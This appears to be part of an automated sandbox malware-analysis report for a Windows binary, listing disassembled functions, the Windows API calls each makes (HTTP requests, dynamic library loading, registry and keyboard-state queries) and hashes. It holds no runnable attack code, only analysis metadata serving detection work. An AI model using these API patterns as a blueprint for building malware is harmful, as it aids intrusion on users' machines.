                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1951874230-3916222277
                                                                                                                      • Opcode ID: d13dfeb3a87e13d32e4c74c4764b0d94bb434da90ad274f019925689140ecd2e
                                                                                                                      • Instruction ID: fe00d52f5c7f5e49aecf2a76eed5c787084d6acd0e754384ce353b9a498cbcf1
                                                                                                                      • Opcode Fuzzy Hash: d13dfeb3a87e13d32e4c74c4764b0d94bb434da90ad274f019925689140ecd2e
                                                                                                                      • Instruction Fuzzy Hash: B421B0B6A4020CBFEB12DF64DC84EBB76ECEB89744F10402AF205D6150DB648D055764
                                                                                                                      Function 003A38E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0041454E
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • _memset.LIBCMT ref: 003A3965
                                                                                                                      • _wcscpy.LIBCMT ref: 003A39B5
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 003A39C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                      • Opcode ID: 57f53b2b1c392228c53561b95c899e842b6326c0797a56cf497b785e5474e361
                                                                                                                      • Instruction ID: d1ed1fcc621242e4923738b5bffb9d58b3dc6953e636e4bf486e77de7b284331
                                                                                                                      • Opcode Fuzzy Hash: 57f53b2b1c392228c53561b95c899e842b6326c0797a56cf497b785e5474e361
                                                                                                                      • Instruction Fuzzy Hash: F731B571409340ABD722EB50DC45FDB77E8EF46350F44452EF185861A1EBB4AA88CB97
                                                                                                                      Function 00408EEF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003BC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                        • Part of subcall function 003BC619: GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                        • Part of subcall function 003BC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00408F69
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 00408F70
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00408F85
                                                                                                                      • DestroyWindow.USER32(?), ref: 00408F8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: 64629a8055ece114a856f5a8a5f5251ab0ea5a0fb392c88a164fb80c5d4dc74a
                                                                                                                      • Instruction ID: b01b2b93437c093f2b45dc7833f4ac6964dacc81149941dfebdd358115cad2bc
                                                                                                                      • Opcode Fuzzy Hash: 64629a8055ece114a856f5a8a5f5251ab0ea5a0fb392c88a164fb80c5d4dc74a
                                                                                                                      • Instruction Fuzzy Hash: 3A219D71200206AFEF105E74DD40EBB37AAEB49328F10563EFA94A72D1CB79DC519768
                                                                                                                      Function 003EE382 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 003EE392
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 003EE3E6
                                                                                                                      • __swprintf.LIBCMT ref: 003EE3FF
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0043DBF0), ref: 003EE43D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: 51466e2aff961a0ece96a8b50264807fe84d8920005afa540513bc59184c2240
                                                                                                                      • Instruction ID: 9dbe7c4d612794bdb9f55171cd4d463b2f2167e2a2306d76b95b5130e15390dd
                                                                                                                      • Opcode Fuzzy Hash: 51466e2aff961a0ece96a8b50264807fe84d8920005afa540513bc59184c2240
                                                                                                                      • Instruction Fuzzy Hash: 41214135A40108AFCB11EF65C885EEEB7B8EF49715F1040A9F505DB291D631DA05CB50
                                                                                                                      Function 003DD7D6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                        • Part of subcall function 003DD623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 003DD640
                                                                                                                        • Part of subcall function 003DD623: GetWindowThreadProcessId.USER32(?,00000000), ref: 003DD653
                                                                                                                        • Part of subcall function 003DD623: GetCurrentThreadId.KERNEL32 ref: 003DD65A
                                                                                                                        • Part of subcall function 003DD623: AttachThreadInput.USER32(00000000), ref: 003DD661
                                                                                                                      • GetFocus.USER32 ref: 003DD7FB
                                                                                                                        • Part of subcall function 003DD66C: GetParent.USER32(?), ref: 003DD67A
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 003DD844
                                                                                                                      • EnumChildWindows.USER32(?,003DD8BA), ref: 003DD86C
                                                                                                                      • __swprintf.LIBCMT ref: 003DD886
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 1941087503-1110647743
                                                                                                                      • Opcode ID: 8b95bc2dbf4c8253c47b6ec066f040f25efe671174e166add223ba2a1d3f98e1
                                                                                                                      • Instruction ID: dc7cff05e8a02cdaabdc4ca68fa4dfd06fd8ab3dae866524cc8eb5db1fdda7ee
                                                                                                                      • Opcode Fuzzy Hash: 8b95bc2dbf4c8253c47b6ec066f040f25efe671174e166add223ba2a1d3f98e1
                                                                                                                      • Instruction Fuzzy Hash: 9F1154766002056BDB237F50AC85FEA376DAB45704F0040BAFD19AE246DBB499459B70
                                                                                                                      Function 003BC619 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 003BC657
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 003BC66B
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 003BC675
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3970641297-2594219639
                                                                                                                      • Opcode ID: 7f0b2198a965f31808948913deed47a60d2056546e3b933010f956e7c3e828b2
                                                                                                                      • Instruction ID: f014245bc2b4904aceeea8f8e6f4c10f87ef38574c78523171f9525eaa379b04
                                                                                                                      • Opcode Fuzzy Hash: 7f0b2198a965f31808948913deed47a60d2056546e3b933010f956e7c3e828b2
                                                                                                                      • Instruction Fuzzy Hash: 1811A172A11548BFDB264FA08C40FEABB6DFF08358F0A1216FB0452020C735DC61DBA4
                                                                                                                      Function 00401836 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004018E4
                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00401917
                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00401A3A
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00401AB0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2364364464-0
                                                                                                                      • Opcode ID: b9b035eb08a4ba9b3f66d67f413fd9aaab2c92c7c5cc98056251fac883bb02ad
                                                                                                                      • Instruction ID: 5c9f7cb6cd291b79276999c7ae71835160ca485c1e9220a50647427b612f9854
                                                                                                                      • Opcode Fuzzy Hash: b9b035eb08a4ba9b3f66d67f413fd9aaab2c92c7c5cc98056251fac883bb02ad
                                                                                                                      • Instruction Fuzzy Hash: 0F818370B10204ABDF119F64C886BAEBBF5AF44724F14805AF905BF3D2D7B8A9418F94
                                                                                                                      Function 00400579 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004005DF
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0040066E
                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040068C
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004006D2
                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 004006EC
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,003EAEA5,?,?,00000000,00000008), ref: 003BF282
                                                                                                                        • Part of subcall function 003BF26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,003EAEA5,?,?,00000000,00000008), ref: 003BF2A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 327935632-0
                                                                                                                      • Opcode ID: 02b021d9df96abd834eed6bfbfec3db02fb64fb56880ca8932be45843baf6750
                                                                                                                      • Instruction ID: fba204a0fdd1ab55ec4cd8fa94de3f5f08505cd01c7d1570c61f3577c09c3d16
                                                                                                                      • Opcode Fuzzy Hash: 02b021d9df96abd834eed6bfbfec3db02fb64fb56880ca8932be45843baf6750
                                                                                                                      • Instruction Fuzzy Hash: 0E519935A00205DFCB01EFA8C891AEEB7B5FF49310F048066E905AB392DB35ED06CB85
                                                                                                                      Function 00402D1A Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00402DE0
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402E1F
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00402E66
                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00402E92
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402E9F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3440857362-0
                                                                                                                      • Opcode ID: bfee09796896db7646152797a1dc945760d7a09bb83d77e47c31d2594d54ddc7
                                                                                                                      • Instruction ID: 617967e68b7ace6e150fec5bd64449be7b60b9adf073f34ee344bfe227f91a36
                                                                                                                      • Opcode Fuzzy Hash: bfee09796896db7646152797a1dc945760d7a09bb83d77e47c31d2594d54ddc7
                                                                                                                      • Instruction Fuzzy Hash: 9A519D31214204AFC705EF64C985E6BB7E8FF88314F00492EF9969B2E1DB74E905CB56
                                                                                                                      Function 003F1726 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003F17D4
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003F17FD
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003F183C
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003F1861
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003F1869
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1389676194-0
                                                                                                                      • Opcode ID: 496554e19a4557ac58f3721033a3a0b9873a4140719d549ae0c31aa82f178f90
                                                                                                                      • Instruction ID: ea0dc301f356df77c11067702276222beb4eb9517f26faeed4881c672134b8e4
                                                                                                                      • Opcode Fuzzy Hash: 496554e19a4557ac58f3721033a3a0b9873a4140719d549ae0c31aa82f178f90
                                                                                                                      • Instruction Fuzzy Hash: FB410A35A00209DFDB12EF65C981AADBBF5EF49314B1480A9E909AF361DB31ED41DB60
                                                                                                                      Function 003BB736 Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(000000FF), ref: 003BB749
                                                                                                                      • ScreenToClient.USER32(00000000,000000FF), ref: 003BB766
                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 003BB78B
                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 003BB799
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4210589936-0
                                                                                                                      • Opcode ID: be75c695e034a1e68ea3bcf1ea815ae543c8c2928946ddc5169922b795eb2290
                                                                                                                      • Instruction ID: f063409ef12dd9427cee6c3c567b4d68ba230775a28245c748c9868445096d8d
                                                                                                                      • Opcode Fuzzy Hash: be75c695e034a1e68ea3bcf1ea815ae543c8c2928946ddc5169922b795eb2290
                                                                                                                      • Instruction Fuzzy Hash: F7419235A04209FFDF159F65C884AEAFB74FF45364F20422AF825922D0CB74AD90DB95
                                                                                                                      Function 003DC145 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 003DC156
                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 003DC200
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 003DC208
                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 003DC216
                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 003DC21E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3382505437-0
                                                                                                                      • Opcode ID: d7bfb1452d4956ce4ba6dd938eb1e9aff1c3904a6a79e1f0f7df215a5372f9af
                                                                                                                      • Instruction ID: 248717bcc8e13932342463ddfcb5b8c07cb535cba34602359fb1d0b5c55ed653
                                                                                                                      • Opcode Fuzzy Hash: d7bfb1452d4956ce4ba6dd938eb1e9aff1c3904a6a79e1f0f7df215a5372f9af
                                                                                                                      • Instruction Fuzzy Hash: CB31E57291022AEBDF14CF68DD4DA9E3BB5EF04315F104225F920E72D1C7B09914CB50
